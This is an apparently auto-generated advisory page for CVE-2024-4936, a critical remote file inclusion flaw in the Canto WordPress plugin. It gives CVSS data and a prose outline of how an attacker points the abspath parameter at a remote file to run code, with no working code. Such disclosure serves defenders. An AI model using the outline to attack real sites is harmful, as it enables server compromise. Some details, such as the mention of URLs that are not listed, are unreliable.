Description

The Canto plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 3.0.8 via the abspath parameter. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. This required allow_url_include to be enabled on the target site in order to exploit.

Classification

Assigner:

CWE:

Links
CPEs
  • canto wordpress_plugin 3.0.8

CVSS

CVSS version: 3.1 Base score: 9.8
Base severity: CRITICAL Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitability score: 3.9 Impact score: 5.9

Can you explain the CVE description?

This CVE description is for a vulnerability identified as CVE-2024-4936 in the Canto plugin for WordPress. The vulnerability allows for Remote File Inclusion in all versions up to and including 3.0.8 via the abspath parameter. This vulnerability can be exploited by unauthenticated attackers to include remote files on the server, potentially leading to code execution. The exploit requires that allow_url_include is enabled on the target site. The CVSS score for this vulnerability is 9.8, indicating a critical severity level. The vulnerability was published on June 14, 2024, and is currently in an EARLY_WARNING status. The exploitability score is 3.9 and the impact score is 5.9. For more information, you can refer to the provided URLs for details on the vulnerability and potential mitigation steps.

How can this vulnerability be part of an attack tree?

This vulnerability can be part of an attack tree by allowing an attacker to exploit the Remote File Inclusion vulnerability in the Canto plugin for WordPress. The attacker can craft a malicious request with the abspath parameter pointing to a remote file containing malicious code. If the target site has allow_url_include enabled, the attacker can trigger the inclusion of the remote file on the server, leading to code execution. This can be used as a stepping stone for further attacks, such as gaining unauthorized access to sensitive data, installing backdoors, or escalating privileges on the target system.


Generated on: 2024-07-01